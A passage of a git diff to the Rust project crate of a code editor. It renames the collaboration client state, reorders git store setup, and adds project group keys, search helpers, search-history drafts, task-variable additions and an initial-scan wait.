committer_name: committer.name, + features: CURRENT_PROJECT_FEATURES + .iter() + .map(|s| s.to_string()) + .collect(), }) .await?; Self::from_join_project_response( @@ -1719,6 +1734,17 @@ impl Project { ) }); + let git_store = cx.new(|cx| { + GitStore::remote( + // In this remote case we pass None for the environment + &worktree_store, + buffer_store.clone(), + client.clone().into(), + remote_id, + cx, + ) + }); + let task_store = cx.new(|cx| { if run_tasks { TaskStore::remote( @@ -1727,6 +1753,7 @@ impl Project { Arc::new(EmptyToolchainStore), client.clone().into(), remote_id, + git_store.clone(), cx, ) } else { @@ -1745,17 +1772,6 @@ impl Project { ) }); - let git_store = cx.new(|cx| { - GitStore::remote( - // In this remote case we pass None for the environment - &worktree_store, - buffer_store.clone(), - client.clone().into(), - remote_id, - cx, - ) - }); - let agent_server_store = cx.new(|_cx| AgentServerStore::collab()); let replica_id = ReplicaId::new(response.payload.replica_id as u16); @@ -1815,7 +1831,7 @@ impl Project { client_subscriptions: Default::default(), _subscriptions: vec![cx.on_release(Self::release)], collab_client: client.clone(), - client_state: ProjectClientState::Remote { + client_state: ProjectClientState::Collab { sharing_has_stopped: false, capability: Capability::ReadWrite, remote_id, @@ -1933,7 +1949,7 @@ impl Project { ProjectClientState::Shared { .. } => { let _ = self.unshare_internal(cx); } - ProjectClientState::Remote { remote_id, .. } => { + ProjectClientState::Collab { remote_id, .. } => { let _ = self.collab_client.send(proto::LeaveProject { project_id: *remote_id, }); @@ -1942,6 +1958,11 @@ impl Project { } } + #[cfg(feature = "test-support")] + pub fn client_subscriptions(&self) -> &Vec { + &self.client_subscriptions + } + #[cfg(feature = "test-support")] pub async fn example( root_paths: impl IntoIterator, @@ -2073,6 +2094,12 @@ impl Project { self.worktree_store.clone() } + /// Returns a future that resolves when all visible worktrees have completed + /// their initial scan. + pub fn wait_for_initial_scan(&self, cx: &App) -> impl Future + use<> { + self.worktree_store.read(cx).wait_for_initial_scan() + } + #[inline] pub fn context_server_store(&self) -> Entity { self.context_server_store.clone() @@ -2154,7 +2181,7 @@ impl Project { match self.client_state { ProjectClientState::Local => None, ProjectClientState::Shared { remote_id, .. } - | ProjectClientState::Remote { remote_id, .. } => Some(remote_id), + | ProjectClientState::Collab { remote_id, .. } => Some(remote_id), } } @@ -2208,7 +2235,7 @@ impl Project { #[inline] pub fn replica_id(&self) -> ReplicaId { match self.client_state { - ProjectClientState::Remote { replica_id, .. } => replica_id, + ProjectClientState::Collab { replica_id, .. } => replica_id, _ => { if self.remote_client.is_some() { ReplicaId::REMOTE_SERVER @@ -2282,12 +2309,62 @@ impl Project { self.worktree_store.read(cx).visible_worktrees(cx) } + pub(crate) fn default_visible_worktree_paths( + worktree_store: &WorktreeStore, + cx: &App, + ) -> Vec { + worktree_store + .visible_worktrees(cx) + .sorted_by(|left, right| { + left.read(cx) + .is_single_file() + .cmp(&right.read(cx).is_single_file()) + }) + .filter_map(|worktree| { + let worktree = worktree.read(cx); + let path = worktree.abs_path(); + if worktree.is_single_file() { + Some(path.parent()?.to_path_buf()) + } else { + Some(path.to_path_buf()) + } + }) + .collect() + } + + pub fn default_path_list(&self, cx: &App) -> PathList { + let worktree_roots = + Self::default_visible_worktree_paths(&self.worktree_store.read(cx), cx); + + if worktree_roots.is_empty() { + PathList::new(&[paths::home_dir().as_path()]) + } else { + PathList::new(&worktree_roots) + } + } + #[inline] pub fn worktree_for_root_name(&self, root_name: &str, cx: &App) -> Option> { self.visible_worktrees(cx) .find(|tree| tree.read(cx).root_name() == root_name) } + pub fn project_group_key(&self, cx: &App) -> ProjectGroupKey { + let roots = self + .visible_worktrees(cx) + .map(|worktree| { + let snapshot = worktree.read(cx).snapshot(); + snapshot + .root_repo_common_dir() + .and_then(|dir| Some(dir.parent()?.to_path_buf())) + .unwrap_or(snapshot.abs_path().to_path_buf()) + }) + .collect::>(); + let host = self.remote_connection_options(cx); + let path_list = PathList::new(&roots); + ProjectGroupKey::new(host, path_list) + } + #[inline] pub fn worktree_root_names<'a>(&'a self, cx: &'a App) -> impl Iterator { self.visible_worktrees(cx) @@ -2722,7 +2799,7 @@ impl Project { } else { Capability::ReadOnly }; - if let ProjectClientState::Remote { capability, .. } = &mut self.client_state { + if let ProjectClientState::Collab { capability, .. } = &mut self.client_state { if *capability == new_capability { return; } @@ -2735,12 +2812,13 @@ impl Project { } fn disconnected_from_host_internal(&mut self, cx: &mut App) { - if let ProjectClientState::Remote { + if let ProjectClientState::Collab { sharing_has_stopped, .. } = &mut self.client_state { *sharing_has_stopped = true; + self.client_subscriptions.clear(); self.collaborators.clear(); self.worktree_store.update(cx, |store, cx| { store.disconnected_from_host(cx); @@ -2761,7 +2839,7 @@ impl Project { #[inline] pub fn is_disconnected(&self, cx: &App) -> bool { match &self.client_state { - ProjectClientState::Remote { + ProjectClientState::Collab { sharing_has_stopped, .. } => *sharing_has_stopped, @@ -2783,7 +2861,7 @@ impl Project { #[inline] pub fn capability(&self) -> Capability { match &self.client_state { - ProjectClientState::Remote { capability, .. } => *capability, + ProjectClientState::Collab { capability, .. } => *capability, ProjectClientState::Shared { .. } | ProjectClientState::Local => Capability::ReadWrite, } } @@ -2799,7 +2877,7 @@ impl Project { ProjectClientState::Local | ProjectClientState::Shared { .. } => { self.remote_client.is_none() } - ProjectClientState::Remote { .. } => false, + ProjectClientState::Collab { .. } => false, } } @@ -2810,7 +2888,7 @@ impl Project { ProjectClientState::Local | ProjectClientState::Shared { .. } => { self.remote_client.is_some() } - ProjectClientState::Remote { .. } => false, + ProjectClientState::Collab { .. } => false, } } @@ -2819,7 +2897,7 @@ impl Project { pub fn is_via_collab(&self) -> bool { match &self.client_state { ProjectClientState::Local | ProjectClientState::Shared { .. } => false, - ProjectClientState::Remote { .. } => true, + ProjectClientState::Collab { .. } => true, } } @@ -3630,11 +3708,11 @@ impl Project { event: &BufferEvent, cx: &mut Context, ) -> Option<()> { - if matches!(event, BufferEvent::Edited | BufferEvent::Reloaded) { + if matches!(event, BufferEvent::Edited { .. } | BufferEvent::Reloaded) { self.request_buffer_diff_recalculation(&buffer, cx); } - if matches!(event, BufferEvent::Edited) { + if matches!(event, BufferEvent::Edited { .. }) { cx.emit(Event::BufferEdited); } @@ -4492,7 +4570,7 @@ impl Project { match &self.client_state { ProjectClientState::Shared { .. } => true, ProjectClientState::Local => false, - ProjectClientState::Remote { .. } => true, + ProjectClientState::Collab { .. } => true, } } @@ -4685,6 +4763,19 @@ impl Project { }); } + pub fn remove_worktree_for_main_worktree_path( + &mut self, + path: impl AsRef, + cx: &mut Context, + ) { + let path = path.as_ref(); + self.worktree_store.update(cx, |worktree_store, cx| { + if let Some(worktree) = worktree_store.worktree_for_main_worktree_path(path, cx) { + worktree_store.remove_worktree(worktree.read(cx).id(), cx); + } + }); + } + fn add_worktree(&mut self, worktree: &Entity, cx: &mut Context) { self.worktree_store.update(cx, |worktree_store, cx| { worktree_store.add(worktree, cx); @@ -5493,25 +5584,51 @@ impl Project { let key = (worktree_id, path); log::debug!("handle_create_file_for_peer: looking up key={:?}", key); - let mut files = downloading_files.lock(); - log::trace!( - "handle_create_file_for_peer: current downloading_files keys: {:?}", - files.keys().collect::>() - ); + let empty_file_destination: Option = { + let mut files = downloading_files.lock(); + log::trace!( + "handle_create_file_for_peer: current downloading_files keys: {:?}", + files.keys().collect::>() + ); + + if let Some(file_entry) = files.get_mut(&key) { + file_entry.total_size = state.content_size; + file_entry.file_id = Some(state.id); + log::debug!( + "handle_create_file_for_peer: updated file entry: total_size={}, file_id={}", + state.content_size, + state.id + ); + } else { + log::warn!( + "handle_create_file_for_peer: key={:?} not found in downloading_files", + key + ); + } + + if state.content_size == 0 { + // No chunks will arrive for an empty file; write it now. + files.remove(&key).map(|entry| entry.destination_path) + } else { + None + } + }; - if let Some(file_entry) = files.get_mut(&key) { - file_entry.total_size = state.content_size; - file_entry.file_id = Some(state.id); + if let Some(destination) = empty_file_destination { log::debug!( - "handle_create_file_for_peer: updated file entry: total_size={}, file_id={}", - state.content_size, - state.id - ); - } else { - log::warn!( - "handle_create_file_for_peer: key={:?} not found in downloading_files", - key + "handle_create_file_for_peer: writing empty file to {:?}", + destination ); + match smol::fs::write(&destination, &[] as &[u8]).await { + Ok(_) => log::info!( + "handle_create_file_for_peer: successfully wrote file to {:?}", + destination + ), + Err(e) => log::error!( + "handle_create_file_for_peer: failed to write empty file: {:?}", + e + ), + } } } else { log::warn!("handle_create_file_for_peer: State has no file field"); @@ -5591,7 +5708,7 @@ impl Project { fn synchronize_remote_buffers(&mut self, cx: &mut Context) -> Task> { let project_id = match self.client_state { - ProjectClientState::Remote { + ProjectClientState::Collab { sharing_has_stopped, remote_id, .. @@ -5930,6 +6047,49 @@ impl Project { } } +/// Identifies a project group by a set of paths the workspaces in this group +/// have. +/// +/// Paths are mapped to their main worktree path first so we can group +/// workspaces by main repos. +#[derive(PartialEq, Eq, Hash, Clone, Debug)] +pub struct ProjectGroupKey { + paths: PathList, + host: Option, +} + +impl ProjectGroupKey { + /// Creates a new `ProjectGroupKey` with the given path list. + /// + /// The path list should point to the git main worktree paths for a project. + pub fn new(host: Option, paths: PathList) -> Self { + Self { paths, host } + } + + pub fn display_name(&self) -> SharedString { + let mut names = Vec::with_capacity(self.paths.paths().len()); + for abs_path in self.paths.paths() { + if let Some(name) = abs_path.file_name() { + names.push(name.to_string_lossy().to_string()); + } + } + if names.is_empty() { + // TODO: Can we do something better in this case? + "Empty Workspace".into() + } else { + names.join(", ").into() + } + } + + pub fn path_list(&self) -> &PathList { + &self.paths + } + + pub fn host(&self) -> Option { + self.host.clone() + } +} + pub struct PathMatchCandidateSet { pub snapshot: Snapshot, pub include_ignored: bool, diff --git a/crates/project/src/project_search.rs b/crates/project/src/project_search.rs index dff3312a3b34dc146153b60d1d5b034fbc720d65..921ad7e26a454d97719310069d81dd423e9208ca 100644 --- a/crates/project/src/project_search.rs +++ b/crates/project/src/project_search.rs @@ -164,6 +164,11 @@ impl Search { let buffer = handle.read(cx); if !buffers.is_searchable(&buffer.remote_id()) { continue; + } else if buffer + .file() + .is_some_and(|file| file.disk_state().is_deleted()) + { + continue; } else if let Some(entry_id) = buffer.entry_id(cx) { open_buffers.insert(entry_id); } else { @@ -586,6 +591,9 @@ impl Search { .filter(|buffer| { let b = buffer.read(cx); if let Some(file) = b.file() { + if file.disk_state().is_deleted() { + return false; + } if !search_query.match_path(file.path()) { return false; } diff --git a/crates/project/src/project_settings.rs b/crates/project/src/project_settings.rs index 75a3faf4f82d9e98e3c85a96222486cac217afd4..9258b16eef9f1c07cc44987f6608c2e0867c4154 100644 --- a/crates/project/src/project_settings.rs +++ b/crates/project/src/project_settings.rs @@ -1407,35 +1407,38 @@ impl SettingsObserver { let (mut user_tasks_file_rx, watcher_task) = watch_config_file(cx.background_executor(), fs, file_path.clone()); let user_tasks_content = cx.foreground_executor().block_on(user_tasks_file_rx.next()); - let weak_entry = cx.weak_entity(); cx.spawn(async move |settings_observer, cx| { let _watcher_task = watcher_task; let Ok(task_store) = settings_observer.read_with(cx, |settings_observer, _| { - settings_observer.task_store.clone() + settings_observer.task_store.downgrade() }) else { return; }; if let Some(user_tasks_content) = user_tasks_content { - task_store.update(cx, |task_store, cx| { - task_store - .update_user_tasks( - TaskSettingsLocation::Global(&file_path), - Some(&user_tasks_content), - cx, - ) - .log_err(); - }); + task_store + .update(cx, |task_store, cx| { + task_store + .update_user_tasks( + TaskSettingsLocation::Global(&file_path), + Some(&user_tasks_content), + cx, + ) + .log_err(); + }) + .ok(); } while let Some(user_tasks_content) = user_tasks_file_rx.next().await { - let result = task_store.update(cx, |task_store, cx| { + let Ok(result) = task_store.update(cx, |task_store, cx| { task_store.update_user_tasks( TaskSettingsLocation::Global(&file_path), Some(&user_tasks_content), cx, ) - }); + }) else { + continue; + }; - weak_entry + settings_observer .update(cx, |_, cx| match result { Ok(()) => cx.emit(SettingsObserverEvent::LocalTasksUpdated(Ok( file_path.clone() @@ -1459,35 +1462,38 @@ impl SettingsObserver { let (mut user_tasks_file_rx, watcher_task) = watch_config_file(cx.background_executor(), fs, file_path.clone()); let user_tasks_content = cx.foreground_executor().block_on(user_tasks_file_rx.next()); - let weak_entry = cx.weak_entity(); cx.spawn(async move |settings_observer, cx| { let _watcher_task = watcher_task; let Ok(task_store) = settings_observer.read_with(cx, |settings_observer, _| { - settings_observer.task_store.clone() + settings_observer.task_store.downgrade() }) else { return; }; if let Some(user_tasks_content) = user_tasks_content { - task_store.update(cx, |task_store, cx| { - task_store - .update_user_debug_scenarios( - TaskSettingsLocation::Global(&file_path), - Some(&user_tasks_content), - cx, - ) - .log_err(); - }); + task_store + .update(cx, |task_store, cx| { + task_store + .update_user_debug_scenarios( + TaskSettingsLocation::Global(&file_path), + Some(&user_tasks_content), + cx, + ) + .log_err(); + }) + .ok(); } while let Some(user_tasks_content) = user_tasks_file_rx.next().await { - let result = task_store.update(cx, |task_store, cx| { + let Ok(result) = task_store.update(cx, |task_store, cx| { task_store.update_user_debug_scenarios( TaskSettingsLocation::Global(&file_path), Some(&user_tasks_content), cx, ) - }); + }) else { + continue; + }; - weak_entry + settings_observer .update(cx, |_, cx| match result { Ok(()) => cx.emit(SettingsObserverEvent::LocalDebugScenariosUpdated(Ok( file_path.clone(), diff --git a/crates/project/src/search.rs b/crates/project/src/search.rs index 3a554eb3da1557849e18846b09a7787ab939f46d..cd4702d04863c2fc3026700b2d6653e1db24dbff 100644 --- a/crates/project/src/search.rs +++ b/crates/project/src/search.rs @@ -620,4 +620,56 @@ impl SearchQuery { Self::Text { .. } => None, } } + + pub fn search_str(&self, text: &str) -> Vec> { + if self.as_str().is_empty() { + return Vec::new(); + } + + let is_word_char = |c: char| c.is_alphanumeric() || c == '_'; + + let mut matches = Vec::new(); + match self { + Self::Text { + search, whole_word, .. + } => { + for mat in search.find_iter(text.as_bytes()) { + if *whole_word { + let prev_char = text[..mat.start()].chars().last(); + let next_char = text[mat.end()..].chars().next(); + if prev_char.is_some_and(&is_word_char) + || next_char.is_some_and(&is_word_char) + { + continue; + } + } + matches.push(mat.start()..mat.end()); + } + } + Self::Regex { + regex, + multiline, + one_match_per_line, + .. + } => { + if *multiline { + for mat in regex.find_iter(text).flatten() { + matches.push(mat.start()..mat.end()); + } + } else { + let mut line_offset = 0; + for line in text.split('\n') { + for mat in regex.find_iter(line).flatten() { + matches.push((line_offset + mat.start())..(line_offset + mat.end())); + if *one_match_per_line { + break; + } + } + line_offset += line.len() + 1; + } + } + } + } + matches + } } diff --git a/crates/project/src/search_history.rs b/crates/project/src/search_history.rs index de3548e4d2670675d441a7bf40e595158e7d34a3..a3b0c0a1bc89ca0fe1f770c6d08b21d740943470 100644 --- a/crates/project/src/search_history.rs +++ b/crates/project/src/search_history.rs @@ -19,12 +19,19 @@ pub enum QueryInsertionBehavior { #[derive(Default, Debug, Clone, PartialEq, Eq, Hash)] pub struct SearchHistoryCursor { selection: Option, + draft: Option, } impl SearchHistoryCursor { - /// Resets the selection to `None`. + /// Resets the selection to `None` and clears the draft. pub fn reset(&mut self) { self.selection = None; + self.draft = None; + } + + /// Takes the stored draft query, if any. + pub fn take_draft(&mut self) -> Option { + self.draft.take() } } @@ -45,6 +52,8 @@ impl SearchHistory { } pub fn add(&mut self, cursor: &mut SearchHistoryCursor, search_string: String) { + cursor.draft = None; + if self.insertion_behavior == QueryInsertionBehavior::ReplacePreviousIfContains && let Some(previously_searched) = self.history.back_mut() && search_string.contains(previously_searched.as_str()) @@ -81,7 +90,23 @@ impl SearchHistory { /// Get the previous history entry using the given `SearchHistoryCursor`. /// Uses the last element in the history when there is no cursor. - pub fn previous(&mut self, cursor: &mut SearchHistoryCursor) -> Option<&str> { + /// + /// `current_query` is the current text in the search editor. If it differs + /// from the history entry at the cursor position (or if the cursor has no + /// selection), it is saved as a draft so it can be restored later. + pub fn previous( + &mut self, + cursor: &mut SearchHistoryCursor, + current_query: &str, + ) -> Option<&str> { + let matches_history = cursor + .selection + .and_then(|i| self.history.get(i)) + .is_some_and(|entry| entry == current_query); + if !matches_history { + cursor.draft = Some(current_query.to_string()); + } + let prev_index = match cursor.selection { Some(index) => index.checked_sub(1)?, None => self.history.len().checked_sub(1)?, diff --git a/crates/project/src/task_inventory.rs b/crates/project/src/task_inventory.rs index 205232b523cf3773d895368ba0b1b7d2d32a7afe..663380181015d52c9a91f1a23c7bd0d48d8ac57d 100644 --- a/crates/project/src/task_inventory.rs +++ b/crates/project/src/task_inventory.rs @@ -15,20 +15,20 @@ use gpui::{App, AppContext as _, Context, Entity, SharedString, Task, WeakEntity use itertools::Itertools; use language::{ Buffer, ContextLocation, ContextProvider, File, Language, LanguageToolchainStore, Location, - language_settings::language_settings, + language_settings::LanguageSettings, }; use lsp::{LanguageServerId, LanguageServerName}; use paths::{debug_task_file_name, task_file_name}; use settings::{InvalidSettingsError, parse_json_with_comments}; use task::{ - DebugScenario, ResolvedTask, SharedTaskContext, TaskContext, TaskId, TaskTemplate, + DebugScenario, ResolvedTask, SharedTaskContext, TaskContext, TaskHook, TaskId, TaskTemplate, TaskTemplates, TaskVariables, VariableName, }; use text::{BufferId, Point, ToPoint}; use util::{NumericPrefixWithSuffix, ResultExt as _, post_inc, rel_path::RelPath}; use worktree::WorktreeId; -use crate::{task_store::TaskSettingsLocation, worktree_store::WorktreeStore}; +use crate::{git_store::GitStore, task_store::TaskSettingsLocation, worktree_store::WorktreeStore}; #[derive(Clone, Debug, Default)] pub struct DebugScenarioContext { @@ -84,10 +84,20 @@ impl InventoryFor { &self, worktree: WorktreeId, ) -> impl '_ + Iterator { - self.worktree - .get(&worktree) + let worktree_dirs = self.worktree.get(&worktree); + let has_zed_dir = worktree_dirs + .map(|dirs| { + dirs.keys() + .any(|dir| dir.file_name().is_some_and(|name| name == ".zed")) + }) + .unwrap_or(false); + + worktree_dirs .into_iter() .flatten() + .filter(move |(directory, _)| { + !(has_zed_dir && directory.file_name().is_some_and(|name| name == ".vscode")) + }) .flat_map(|(directory, templates)| { templates.iter().map(move |template| (directory, template)) }) @@ -302,17 +312,15 @@ impl Inventory { let last_scheduled_scenarios = self.last_scheduled_scenarios.iter().cloned().collect(); let adapter = task_contexts.location().and_then(|location| { - let (file, language) = { - let buffer = location.buffer.read(cx); - (buffer.file(), buffer.language()) - }; - let language_name = language.as_ref().map(|l| l.name()); - let adapter = language_settings(language_name, file, cx) + let buffer = location.buffer.read(cx); + let adapter = LanguageSettings::for_buffer(&buffer, cx) .debuggers .first() .map(SharedString::from) .or_else(|| { - language.and_then(|l| l.config().debuggers.first().map(SharedString::from)) + buffer + .language() + .and_then(|l| l.config().debuggers.first().map(SharedString::from)) }); adapter.map(|adapter| (adapter, DapRegistry::global(cx).locators())) }); @@ -350,19 +358,18 @@ impl Inventory { label: &str, cx: &App, ) -> Task> { - let (buffer_worktree_id, file, language) = buffer + let (buffer_worktree_id, language) = buffer + .as_ref() .map(|buffer| { let buffer = buffer.read(cx); - let file = buffer.file().cloned(); ( - file.as_ref().map(|file| file.worktree_id(cx)), - file, + buffer.file().as_ref().map(|file| file.worktree_id(cx)), buffer.language().cloned(), ) }) - .unwrap_or((None, None, None)); + .unwrap_or((None, None)); - let tasks = self.list_tasks(file, language, worktree_id.or(buffer_worktree_id), cx); + let tasks = self.list_tasks(buffer, language, worktree_id.or(buffer_worktree_id), cx); let label = label.to_owned(); cx.background_spawn(async move { tasks @@ -378,7 +385,7 @@ impl Inventory { /// and global tasks last. No specific order inside source kinds groups. pub fn list_tasks( &self, - file: Option>, + buffer: Option>, language: Option>, worktree: Option, cx: &App, @@ -394,14 +401,18 @@ impl Inventory { }); let language_tasks = language .filter(|language| { - language_settings(Some(language.name()), file.as_ref(), cx) - .tasks - .enabled + LanguageSettings::resolve( + buffer.as_ref().map(|b| b.read(cx)), + Some(&language.name()), + cx, + ) + .tasks + .enabled }) .and_then(|language| { language .context_provider() - .map(|provider| provider.associated_tasks(file, cx)) + .map(|provider| provider.associated_tasks(buffer, cx)) }); cx.background_spawn(async move { if let Some(t) = language_tasks { @@ -435,7 +446,18 @@ impl Inventory { let task_source_kind = language.as_ref().map(|language| TaskSourceKind::Language { name: language.name().into(), }); - let file = location.and_then(|location| location.buffer.read(cx).file().cloned()); + let buffer = location.map(|location| location.buffer.clone()); + + let worktrees_with_zed_tasks: HashSet = self + .templates_from_settings + .worktree + .iter() + .filter(|(_, dirs)| { + dirs.keys() + .any(|dir| dir.file_name().is_some_and(|name| name == ".zed")) + }) + .map(|(id, _)| *id) + .collect(); let mut task_labels_to_ids = HashMap::>::default(); let mut lru_score = 0_u32; @@ -446,6 +468,14 @@ impl Inventory { .filter(|(task_kind, _)| { if matches!(task_kind, TaskSourceKind::Language { .. }) { Some(task_kind) == task_source_kind.as_ref() + } else if let TaskSourceKind::Worktree { + id, + directory_in_worktree: dir, + .. + } = task_kind + { + !(worktrees_with_zed_tasks.contains(id) + && dir.file_name().is_some_and(|name| name == ".vscode")) } else { true } @@ -478,14 +508,18 @@ impl Inventory { let global_tasks = self.global_templates_from_settings().collect::>(); let associated_tasks = language .filter(|language| { - language_settings(Some(language.name()), file.as_ref(), cx) - .tasks - .enabled + LanguageSettings::resolve( + buffer.as_ref().map(|b| b.read(cx)), + Some(&language.name()), + cx, + ) + .tasks + .enabled }) .and_then(|language| { language .context_provider() - .map(|provider| provider.associated_tasks(file, cx)) + .map(|provider| provider.associated_tasks(buffer, cx)) }); let worktree_tasks = worktree .into_iter() @@ -610,6 +644,19 @@ impl Inventory { self.last_scheduled_tasks.retain(|(_, task)| &task.id != id); } + /// Returns all task templates (worktree and global) that have at least one + /// hook in the provided set. + pub fn templates_with_hooks( + &self, + hooks: &HashSet, + worktree: WorktreeId, + ) -> Vec<(TaskSourceKind, TaskTemplate)> { + self.worktree_templates_from_settings(worktree) + .chain(self.global_templates_from_settings()) + .filter(|(_, template)| !template.hooks.is_disjoint(hooks)) + .collect() + } + fn global_templates_from_settings( &self, ) -> impl '_ + Iterator { @@ -884,11 +931,15 @@ fn task_variables_preference(task: &ResolvedTask) -> Reverse { /// Applied as a base for every custom [`ContextProvider`] unless explicitly oped out. pub struct BasicContextProvider { worktree_store: Entity, + git_store: Entity, } impl BasicContextProvider { - pub fn new(worktree_store: Entity) -> Self { - Self { worktree_store } + pub fn new(worktree_store: Entity, git_store: Entity) -> Self { + Self { + worktree_store, + git_store, + } } } @@ -968,6 +1019,19 @@ impl ContextProvider for BasicContextProvider { } } + if let Some(worktree_id) = location.buffer.read(cx).file().map(|f| f.worktree_id(cx)) { + if let Some(path) = self + .git_store + .read(cx) + .original_repo_path_for_worktree(worktree_id, cx) + { + task_variables.insert( + VariableName::MainGitWorktree, + path.to_string_lossy().into_owned(), + ); + } + } + if let Some(current_file) = current_file { let path = current_file.abs_path(cx); if let Some(filename) = path.file_name().and_then(|f| f.to_str()) { @@ -985,6 +1049,10 @@ impl ContextProvider for BasicContextProvider { task_variables.insert(VariableName::File, path.to_string_lossy().into_owned()); } + if let Some(language) = buffer.language() { + task_variables.insert(VariableName::Language, language.name().to_string()); + } + Task::ready(Ok(task_variables)) } } @@ -1003,7 +1071,7 @@ impl ContextProviderWithTasks { } impl ContextProvider for ContextProviderWithTasks { - fn associated_tasks(&self, _: Option>, _: &App) -> Task> { + fn associated_tasks(&self, _: Option>, _: &App) -> Task> { Task::ready(Some(self.templates.clone())) } } diff --git a/crates/project/src/task_store.rs b/crates/project/src/task_store.rs index 7aec460aeb9917eb9c1c58668ece4a10033a7ac9..5b91a3a8901d63e7311fb7ec81a69767b68e02d4 100644 --- a/crates/project/src/task_store.rs +++ b/crates/project/src/task_store.rs @@ -19,7 +19,7 @@ use util::ResultExt; use crate::{ BasicContextProvider, Inventory, ProjectEnvironment, buffer_store::BufferStore, - worktree_store::WorktreeStore, + git_store::GitStore, worktree_store::WorktreeStore, }; // platform-dependent warning @@ -33,6 +33,7 @@ pub struct StoreState { task_inventory: Entity, buffer_store: WeakEntity, worktree_store: Entity, + git_store: Entity, toolchain_store: Arc, } @@ -163,6 +164,7 @@ impl TaskStore { worktree_store: Entity, toolchain_store: Arc, environment: Entity, + git_store: Entity, cx: &mut Context, ) -> Self { Self::Functional(StoreState { @@ -172,6 +174,7 @@ impl TaskStore { }, task_inventory: Inventory::new(cx), buffer_store, + git_store, toolchain_store, worktree_store, }) @@ -183,6 +186,7 @@ impl TaskStore { toolchain_store: Arc, upstream_client: AnyProtoClient, project_id: u64, + git_store: Entity, cx: &mut Context, ) -> Self { Self::Functional(StoreState { @@ -192,6 +196,7 @@ impl TaskStore { }, task_inventory: Inventory::new(cx), buffer_store, + git_store, toolchain_store, worktree_store, }) @@ -207,6 +212,7 @@ impl TaskStore { TaskStore::Functional(state) => match &state.mode { StoreMode::Local { environment, .. } => local_task_context_for_location( state.worktree_store.clone(), + state.git_store.clone(), state.toolchain_store.clone(), environment.clone(), captured_variables, @@ -220,6 +226,7 @@ impl TaskStore { *project_id, upstream_client.clone(), state.worktree_store.clone(), + state.git_store.clone(), captured_variables, location, state.toolchain_store.clone(), @@ -302,6 +309,7 @@ impl TaskStore { fn local_task_context_for_location( worktree_store: Entity, + git_store: Entity, toolchain_store: Arc, environment: Entity, captured_variables: TaskVariables, @@ -329,7 +337,7 @@ fn local_task_context_for_location( worktree_store.clone(), location, project_env.clone(), - BasicContextProvider::new(worktree_store), + BasicContextProvider::new(worktree_store, git_store), toolchain_store, cx, ) @@ -351,6 +359,7 @@ fn remote_task_context_for_location( project_id: u64, upstream_client: AnyProtoClient, worktree_store: Entity, + git_store: Entity, captured_variables: TaskVariables, location: Location, toolchain_store: Arc, @@ -362,7 +371,7 @@ fn remote_task_context_for_location( .update(|cx| { let worktree_root = worktree_root(&worktree_store, &location, cx); - BasicContextProvider::new(worktree_store).build_context( + BasicContextProvider::new(worktree_store, git_store).build_context( &TaskVariables::default(), ContextLocation { fs: None, diff --git a/crates/project/src/toolchain_store.rs b/crates/project/src/toolchain_store.rs index 0820e4506e5c6b8d51c2732c64afcb21566350dd..c72b99c6a11271870ab8d4b4b73a7c8eb5e095ba 100644 --- a/crates/project/src/toolchain_store.rs +++ b/crates/project/src/toolchain_store.rs @@ -4,7 +4,7 @@ use anyhow::{Context as _, Result, bail}; use async_trait::async_trait; use collections::{BTreeMap, IndexSet}; -use fs::Fs; + use gpui::{ App, AppContext as _, AsyncApp, Context, Entity, EventEmitter, Subscription, Task, WeakEntity, }; @@ -62,7 +62,6 @@ impl ToolchainStore { worktree_store: Entity, project_environment: Entity, manifest_tree: Entity, - fs: Arc, cx: &mut Context, ) -> Self { let entity = cx.new(|_| LocalToolchainStore { @@ -71,7 +70,6 @@ impl ToolchainStore { project_environment, active_toolchains: Default::default(), manifest_tree, - fs, }); let _sub = cx.subscribe(&entity, |_, _, e: &ToolchainStoreEvent, cx| { cx.emit(e.clone()) @@ -418,7 +416,6 @@ pub struct LocalToolchainStore { project_environment: Entity, active_toolchains: BTreeMap<(WorktreeId, LanguageName), BTreeMap, Toolchain>>, manifest_tree: Entity, - fs: Arc, } #[async_trait(?Send)] @@ -507,7 +504,6 @@ impl LocalToolchainStore { let registry = self.languages.clone(); let manifest_tree = self.manifest_tree.downgrade(); - let fs = self.fs.clone(); let environment = self.project_environment.clone(); cx.spawn(async move |this, cx| { @@ -554,12 +550,7 @@ impl LocalToolchainStore { cx.background_spawn(async move { Some(( toolchains - .list( - worktree_root, - relative_path.path.clone(), - project_env, - fs.as_ref(), - ) + .list(worktree_root, relative_path.path.clone(), project_env) .await, relative_path.path, )) @@ -593,7 +584,6 @@ impl LocalToolchainStore { ) -> Task> { let registry = self.languages.clone(); let environment = self.project_environment.clone(); - let fs = self.fs.clone(); cx.spawn(async move |_, cx| { let language = cx .background_spawn(registry.language_for_name(&language_name.0)) @@ -612,12 +602,8 @@ impl LocalToolchainStore { ) }) .await; - cx.background_spawn(async move { - toolchain_lister - .resolve(path, project_env, fs.as_ref()) - .await - }) - .await + cx.background_spawn(async move { toolchain_lister.resolve(path, project_env).await }) + .await }) } } diff --git a/crates/project/src/worktree_store.rs b/crates/project/src/worktree_store.rs index 31a6cc041eda875f3c7ee5b33b77519d7ee2b142..7ca721ddb50c3f216ed630665e547b60ce4d52bf 100644 --- a/crates/project/src/worktree_store.rs +++ b/crates/project/src/worktree_store.rs @@ -1,4 +1,5 @@ use std::{ + future::Future, path::{Path, PathBuf}, sync::{ Arc, @@ -15,6 +16,7 @@ use gpui::{ WeakEntity, }; use itertools::Either; +use postage::{prelude::Stream as _, watch}; use rpc::{ AnyProtoClient, ErrorExt, TypedEnvelope, proto::{self, REMOTE_SERVER_PROJECT_ID}, @@ -75,6 +77,7 @@ pub struct WorktreeStore { #[allow(clippy::type_complexity)] loading_worktrees: HashMap, Shared, Arc>>>>, + initial_scan_complete: (watch::Sender, watch::Receiver), state: WorktreeStoreState, } @@ -119,6 +122,7 @@ impl WorktreeStore { worktrees_reordered: false, scanning_enabled: true, retain_worktrees, + initial_scan_complete: watch::channel_with(true), state: WorktreeStoreState::Local { fs }, } } @@ -139,6 +143,7 @@ impl WorktreeStore { worktrees_reordered: false, scanning_enabled: true, retain_worktrees, + initial_scan_complete: watch::channel_with(true), state: WorktreeStoreState::Remote { upstream_client, upstream_project_id, @@ -174,6 +179,57 @@ impl WorktreeStore { pub fn disable_scanner(&mut self) { self.scanning_enabled = false; + *self.initial_scan_complete.0.borrow_mut() = true; + } + + /// Returns a future that resolves when all visible worktrees have completed + /// their initial scan (entries populated, git repos detected). + pub fn wait_for_initial_scan(&self) -> impl Future + use<> { + let mut rx = self.initial_scan_complete.1.clone(); + async move { + let mut done = *rx.borrow(); + while !done { + if let Some(value) = rx.recv().await { + done = value; + } else { + break; + } 